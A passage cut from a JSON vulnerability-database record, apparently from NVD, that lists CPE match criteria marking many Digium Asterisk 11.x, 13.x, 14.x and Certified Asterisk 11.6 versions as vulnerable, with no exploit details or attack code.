              "criteria": "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3BD16A9-24BC-4FC1-81BA-A6D1FEF38D35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68BAAD53-DE75-41CA-BF60-C0363029D3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CDC383B3-27EF-4C37-94BE-F0D41B34CAFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A7824B34-06C3-403B-B6F3-C850D54438EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "17E86941-98F6-45A5-8646-6876F74D909F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6DB27C0-C74E-4E6A-AA63-09CFE73C2EF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6C443A3B-DF96-4A68-B046-DE13689CA974",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F3AC9AE-288C-4F0E-BF15-C3F4AF09D8E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "796A6021-9FCA-4354-A47C-7500C363C168",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EBB9D073-195F-4C2A-932E-7F027710DB25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "604E58C8-9B81-4992-8993-4A6CB876EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "077C4CB8-1FDE-45D3-82E6-CE09A22809B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3CDB96CA-5AAE-4B39-8E01-2E72E3B476AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8EB33EC3-CDE0-40BD-B269-512AE074D278",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "363FA95F-03EF-4D6A-A40D-76D285D16255",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA96DC31-4BAC-4C5A-923C-EBBFFC7ABB52",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C949D5F5-6C0B-4B17-85B6-3A77D08CF967",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D413741-BDB7-496D-A01B-75E2A98FDB5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "29130F7F-DE00-43E1-A4A6-8F1F95D5CB19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "25E94EC0-F577-4B2B-8B11-DC76278CDD42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "101AD474-9B89-483D-84E8-08012677C55C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D57E41F6-C2CF-4183-A78A-9531A88FB65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1F9BB8-F951-427E-B770-69C2ACEBDB28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C4CE405-E923-4C9C-849A-D1031C4DB493",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C039C0CE-9C9C-4D85-8D7C-574DCF9D920B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B2F2CC-18C3-46E7-8E7F-970622A710C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "04ECDFF1-9718-4FAE-B45B-4F8CCA82829E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "89036D04-EA04-4041-9694-6768478D35F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B19070D3-9F03-43C7-9F31-9A54BD5F2441",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39BAA74-50A8-4087-8FF8-7C5922121319",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D29C253-B403-4B00-A626-3E3A920DC018",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E9D8FA2-21EA-4384-8001-118DA7C959F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3368DE88-7009-46A0-93F4-4D52BAD3D173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "26586127-B68B-4476-8182-C49B1B1DCDC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D1EFDCC-983E-4227-9FD5-456C16610BC8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DFA7DBAD-BCA6-47D1-A92E-4EB7941F55F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "02C6C827-97A6-4287-8B3E-DE29054242B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9BE4F7C1-BB82-44BA-BBFD-9F660330EC15",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E4FCA146-5A72-4746-BE23-63271FBC4D47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0C90BB-C3FE-4A75-B739-0236C4256F7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46BD9466-0BC9-4B4D-928F-240CD46D306C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "06F456AD-19D3-49EF-82B1-07370F6499AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "24A9997E-D0DC-45B0-B4DB-308667FA820E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "26202E79-98E0-4533-B4AE-1ABB2477F5A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C3D7384F-DF1B-4ED7-B1D5-885B95774DDB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7BE4127D-8123-4408-86D3-08168A4501B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8836F348-66DF-43BC-9962-946018D13127",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B3D89C7-909F-419A-9EE8-A1F0D02934EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4A036F91-70E0-4E97-9896-EEE97BE3C20E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C92ECBCD-1EE3-498A-B3A4-22BF8EFD2EE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "65607103-4284-430A-8212-AC1DCFFFA778",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "00099DC9-D437-429B-9D08-F0DFA4942A6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "4149F36C-D455-415F-93D7-F92EEE41419D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "89504BDC-82F7-4813-9C1E-456C9ACC6FB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "118C550E-79A8-431E-BADB-710EEEEDC6C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "96C7950F-41D1-46B5-BA62-E8450CB81244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C9A32ECC-E208-4834-8EF7-FEF7A3495041",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5DF6BC60-23F5-46A1-83F8-F4BCDEF196EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AA3E0D41-2E6E-4294-8E56-1A738A7F9AA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D16109B8-4CDF-46FC-9AD9-A158E532791B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9DCAA174-3CA3-49DB-BA19-D2BCF4F8953F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0F5EE428-98FF-42BC-9F61-311327B8F610",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBA2FD08-D761-410F-9804-A76F0DD77349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74B34C21-D90B-4E32-BBA6-7773DB663F18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "90996D49-5731-4F7D-9DBE-D0599A5D85A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D3C91C8D-707D-443D-985F-FA3EDB181208",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "400EA2E1-B178-467F-BBC2-1B2ECEDE662A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E00A6C7-D3CF-40B5-A586-06E09C5AA1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E25D043-EE0D-49A5-A468-03EDD9CFE0EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CA17630B-444D-4AE4-B582-F8106C4EEFDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "62A20D6B-62FE-440D-BC58-F764AAA5562B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F2AE880B-2FA2-42BB-BEBF-771E18FDA141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC982D1B-B018-474E-94BE-2157C21276C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F26815C8-8E43-4C26-947B-986EFFF0ACE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "03E8213E-650F-4C95-B9E5-753E7784EF5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "00B8F794-A7F2-4B8F-B36C-55E61DC6939A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B7FC3A1-AFB0-4280-BFC5-68F61CFD0AF2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "5CEBE67E-A3E5-4BC9-8740-4F51123CC9F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "CD094E25-5E10-4564-9A4D-BE5A14C2815F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B6873174-0109-402F-ADCA-B1635F441FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:*:*:*:*",
              "matchCriteriaId": "B529CD2F-2958-44E6-839A-3E4FE392B1F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:*:*:*:*",
              "matchCriteriaId": "B961BF46-DEF7-4804-AF9A-D13F160FA213",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DDC801D4-7A69-4855-8757-24ACE70D784B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "60C2B8F0-7722-48B5-89AA-435F52CBC0A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:*:*:*:*",
              "matchCriteriaId": "B9305CA8-835C-4DFF-9CD8-C1072BACED42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert16:*:*:*:*:*:*",
              "matchCriteriaId": "B3729EA6-3949-4854-80D4-DC5587161FBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7D60B24-C509-49C3-87A9-49D05CB44183",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "3C1F9978-44E7-4D39-BEC6-5C6DB7F893E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "69BA61A8-2A95-4800-BB4E-692BA4321A84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "C481D8B0-622D-491D-B292-717B0369B507",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "BC8390D4-F339-43FF-9F2B-71331D4ECB81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "4490B76B-FA41-43DB-9A31-6B3F220F1907",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0449B393-FA4E-4664-8E16-BE6B94E4872F",
